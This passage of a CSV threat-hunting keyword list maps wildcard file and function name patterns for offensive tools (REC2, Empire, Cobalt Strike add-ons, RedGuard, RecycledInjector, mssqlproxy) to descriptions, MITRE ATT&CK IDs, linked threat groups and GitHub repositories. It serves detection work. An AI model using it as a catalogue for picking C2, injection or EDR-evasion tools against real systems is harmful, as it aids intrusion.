TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2_mastodon_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2_virustotal_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2mastodon.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2virustotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2virustotal.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*Receive-AgentJob*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*reciclador.cpp*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" +"*reciclador.dll*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" +"*reciclador.vcxproj*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" +"*recon_passive.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Recon-AD-*.dll*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-*.sln*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-*.vcxproj*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-AllLocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-Domain*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-LocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-SPNs*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-Users.*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*recon-archy analyse*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy build*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy crawl*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy-master*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*ReconUserGroupRoles.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*RecycledInjector.exe*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RED_HAWK*","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2612","837","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" +"*Red-Baron*","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Frameworks","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","4","362","72","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z" +"*redelk_backend_name_c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redelk_backend_name_decoy*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedGuard.log*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard/core*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x64.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x86.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*redhuntlabs*","offensive_tool_keyword","redhuntlabs","documentation for offensive operation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*redhuntlabs/BucketLoot*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as 